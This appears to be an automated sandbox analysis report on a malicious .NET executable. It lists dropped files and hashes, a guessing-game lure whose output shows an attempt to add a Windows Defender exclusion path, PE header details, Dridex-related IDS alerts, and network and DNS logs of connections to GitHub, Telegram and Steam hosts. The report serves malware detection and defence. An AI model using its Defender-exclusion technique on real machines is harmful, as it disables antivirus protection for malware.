                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):476160
                                                                                                                                                                                                                        Entropy (8bit):7.302597587896513
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:fVpxoBb+6pIE70i+cif0o5HDl5nUnOpvJ3wpUfcx+43+jyQ/D5PvugK/alI1DB4E:6Ii+cni3h3wpUy+5jyqFvlMfQWt
                                                                                                                                                                                                                        MD5:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                                                                        SHA1:1906C904A33B1910B88F2020A7942776AB7AD54E
                                                                                                                                                                                                                        SHA-256:36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
                                                                                                                                                                                                                        SHA-512:B9A64DAA7591029D966D8AC6684C1EB049F6A3F89865FB760E0EBFE57DC300D3F6F50DACE3353E461370655A8D8BF518AC7B176C574F73ECD43713AD9851282F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: Ttok18.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Mg..........................................@...........................(.............................................H.................................(........................................\...........P................................text............................... ....rdata..............................@..@.data...D!".........................@....00cfg........'.....................@..@.reloc.......(.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3622
                                                                                                                                                                                                                        Entropy (8bit):5.159787377196509
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:3Zp9OMdzvXpwwyJDbcwMhtic5+3OtZ5+3QlticB+3OtZB+3Qqntic0+3OtZ0+3ip:ddzv5wtRcwM8JgY5gqlqvw7
                                                                                                                                                                                                                        MD5:7123653A9955360E570498978834DC21
                                                                                                                                                                                                                        SHA1:10F79C5E7494CCC7C1B52B285B4C6DC2482C7FFC
                                                                                                                                                                                                                        SHA-256:BA674902E6BB0800509B7688301E4C38D54742809DD6809DD8A3616AE68C0B49
                                                                                                                                                                                                                        SHA-512:BB10A617189CE07C57AEDF174F734B6FD3F36DF9B0D72112D03CC989C811155C1CF071B3E3F2524E00277BFB24306158388EF104EBB09093A12C0BE6E6D797D8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:Guess the word from the list:..1. Lion..2. Island..3. Monkey..4. Clan..5. Sun..6. Dog..7. Fish..8. Giraffe..9. Queen..10. Elephant..11. Ocean..12. Kite..13. Apple..14. Car..15. Nest..16. River..17. Tree..18. Penguin..19. Banana..20. Jungle..21. House..Enter the word: .Time's up! The program will input the word 'Clan'...Folder 'VmTatwGQo' successfully created on C drive....You won a random image:.... |\ \\\\__ o.. |\_/ o \ o .. |_ (( <==> o.. |/ \__+___/.. | / |....What image was generated? (fish, mountain, boat): .Time's up! The program will input the correct answer: fish..Error adding exclusion for C:\VmTatwGQo: Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\VmTatwGQo..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreferenc
                                                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):0.013532866334979686
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                        File name:YYjRtxS70h.exe
                                                                                                                                                                                                                        File size:13'793'970 bytes
                                                                                                                                                                                                                        MD5:5a59ce92b07de68c0be8fbd7944214e2
SHA1: b0536d674552c3a11a881b154b668af1b5222641
SHA256: e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
SHA512: e60be536b168890257e483912e89c5061a49f9781ec118517fc58a633ebf6e14cb6d917dc0c4b002faa07b4d4f2fa3b37d7f21725cf768dca74d397aee22f0bc
SSDEEP: 384:x7NC8gTTF+chkAcvEUgE2a24dsp0T808rFaVz:PxgvF+6kVvfbcRaJ
TLSH: E2D6E60223E95126FA7F6B7D5C7242144733BDA3AC36EB4C29EC604E5FA778449607A3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?..........."...0..4...........S... ...`....@.. ....................................`................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4053fa
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the disassembler decoding the zero-byte padding that follows the entry stub)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53a8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x58c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x531c | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x3400 | 0x3400 | 011f0b5a834ddae1739be2df85bbd209 | False | 0.48828125 | data | 5.376676584631292 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x58c | 0x600 | 6ce900aa6f5ef6addbe166008c1ea961 | False | 0.4134114583333333 | data | 4.023178449253273 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0xc | 0x200 | ada691d652edc54d38296e18f64ff460 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x6090 | 0x2fc | data | | | 0.43848167539267013
RT_MANIFEST | 0x639c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T08:51:37.056484+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49721 | 37.27.43.98 | 443 | TCP
2024-12-23T08:52:55.063421+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49712 | 37.27.43.98 | 443 | TCP
2024-12-23T08:53:31.487765+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49716 | 37.27.43.98 | 443 | TCP
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237907887 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237942934 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.237967014 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.327958107 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.328005075 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.328185081 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.328223944 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.328334093 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341501951 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341542006 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341691971 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341737032 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.341818094 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354293108 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354326963 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354415894 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354434967 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354470968 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.354470968 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364768028 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364804029 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364870071 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364886045 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364912987 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.364938021 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.376883030 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.376923084 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.376974106 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.376990080 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.377021074 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.377038002 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.387955904 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.387999058 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.388071060 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.388087988 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.388114929 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.388133049 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398730040 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398765087 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398812056 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398824930 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398849964 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.398971081 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410218000 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410255909 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410315037 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410346985 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410377979 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.410398960 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.520895004 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.520942926 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.521059036 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.521115065 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.521152973 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.521172047 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528073072 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528096914 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528177023 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528198957 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528227091 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.528249979 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536319017 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536345005 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536429882 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536457062 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536484957 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.536511898 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540446043 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540494919 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540528059 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540543079 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.540601969 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548156023 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548178911 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548228025 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548243046 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548273087 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.548312902 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.555834055 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.555855036 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.556021929 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.556068897 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.556124926 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562570095 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562592030 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562649965 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562666893 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562695980 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.562716961 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570641041 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570661068 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570794106 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570811987 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.570867062 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.592964888 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.593072891 CET44349709185.199.110.133192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:52:17.593189955 CET49709443192.168.2.8185.199.110.133
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.870835066 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.871351004 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.871381998 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.880717039 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:32.880733013 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404787064 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404808044 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404865026 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404881001 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404880047 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404911041 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.404948950 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.405258894 CET49719443192.168.2.8149.154.167.99
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.405276060 CET44349719149.154.167.99192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419493914 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419506073 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419581890 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419795990 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:33.419820070 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.797450066 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.797523022 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.797957897 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.797964096 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.799829006 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:34.799835920 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659035921 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659061909 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659077883 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659157991 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659178972 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659209967 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.659234047 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768791914 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768815994 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768889904 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768904924 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.768942118 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784017086 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784086943 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784106970 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784130096 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784146070 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784173965 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784531116 CET49720443192.168.2.8104.102.49.254
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.784545898 CET44349720104.102.49.254192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.808844090 CET49721443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.808885098 CET4434972137.27.43.98192.168.2.8
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.808971882 CET49721443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.809313059 CET49721443192.168.2.837.27.43.98
                                                                                                                                                                                                                        Dec 23, 2024 08:53:35.809326887 CET4434972137.27.43.98192.168.2.8
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 23, 2024 08:52:12.007039070 CET  59174        53         192.168.2.8      1.1.1.1
Dec 23, 2024 08:52:12.144217968 CET  53           59174      1.1.1.1          192.168.2.8
Dec 23, 2024 08:52:14.651233912 CET  59597        53         192.168.2.8      1.1.1.1
Dec 23, 2024 08:52:14.788146019 CET  53           59597      1.1.1.1          192.168.2.8
Dec 23, 2024 08:52:18.311718941 CET  50292        53         192.168.2.8      1.1.1.1
Dec 23, 2024 08:52:18.448657036 CET  53           50292      1.1.1.1          192.168.2.8
Dec 23, 2024 08:52:20.433841944 CET  56976        53         192.168.2.8      1.1.1.1
Dec 23, 2024 08:52:20.570995092 CET  53           56976      1.1.1.1          192.168.2.8
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Dec 23, 2024 08:52:12.007039070 CET  192.168.2.8  1.1.1.1  0xd59b    Standard query (0)  github.com                 A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:14.651233912 CET  192.168.2.8  1.1.1.1  0x3ee9    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:18.311718941 CET  192.168.2.8  1.1.1.1  0x3a71    Standard query (0)  t.me                       A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:20.433841944 CET  192.168.2.8  1.1.1.1  0xef5f    Standard query (0)  steamcommunity.com         A (IP address)  IN (0x0001)  false
